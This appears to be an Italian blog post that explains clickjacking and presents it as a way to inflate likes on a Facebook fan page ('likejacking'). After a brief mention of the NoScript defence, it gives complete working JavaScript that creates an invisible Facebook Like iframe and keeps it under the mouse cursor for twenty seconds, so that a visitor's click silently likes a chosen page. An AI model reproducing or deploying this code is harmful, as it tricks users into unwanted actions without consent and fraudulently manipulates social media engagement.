Clickjacking: come aumentare i Mi Piace di una pagina fan di Facebook

Il Clickjacking è una tecnica informatica fraudolenta integrata in alcuni siti web, che sfrutta generalmente JavaScript e che consiste nel nascondere un oggetto dietro un altro oggetto; In questo modo quando un navigatore effettua un click su un oggetto in realtà il suo click viene reindirizzatto su un altro oggetto.

E' facile quindi sfruttare questa tecnica per aumentare i Mi Piace di una qualsiasi pagina fan di Facebook ed in questo caso prende il nome di Likejackink.

Questa tecnica ad esempio è stata sfruttata in molti casi dietro alcuni falsi video player in modo tale che al click sul pulsante Play veniva apprezzata una determinata pagina facebook.

Questo è il modo che usano in molti per aumentare esponenzialmente il numero di fan di una pagina specialmente da coloro che si fanno pagare per aumentare i fan di una pagina facebook.

Per difendersi da questa tecnica su Firefox è disponibile l'estensione NoScript.

Questo è un esmpio di codice per implementare il Likejackink:

<script type="text/javascript">
(function(){
 
  var Xcord = 0,
  Ycord = 0,
  IE = document.all ? true : false;
 
  if (!IE) document.captureEvents(Event.MOUSEMOVE);
 
  var lbox = document.createElement('iframe');
  lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/XXX') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80';
  lbox.scrolling = 'no';
  lbox.frameBorder = 0;
  lbox.allowTransparency = 'true';
  lbox.style.border = 0;
  lbox.style.overflow = 'hidden';
  lbox.style.cursor = 'pointer';
  lbox.style.width = '53px';
  lbox.style.height =  '23px';
  lbox.style.position = 'absolute';
  lbox.style.opacity = 0;
  document.getElementsByTagName('body')[0].appendChild(lbox);
 
  window.addEventListener('mousemove', mouseMove, false);
 
  setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(lbox);
    window.removeEventListener('mousemove', mouseMove, false);
  }, 20000);
 
  function mouseMove(e) {
    if (IE) {
      Xcord = event.clientX + document.body.scrollLeft;
      Ycord = event.clientY + document.body.scrollTop;
    } else {
      Xcord = e.pageX;
      Ycord = e.pageY;
    }
  
    if (Xcord < 0) Xcord = 0;
    if (Ycord < 0) Ycord = 0;
  
    lbox.style.top = (Ycord - 8) + 'px';
    lbox.style.left = (Xcord - 25) + 'px';
  
    return true
  }
})();
</script>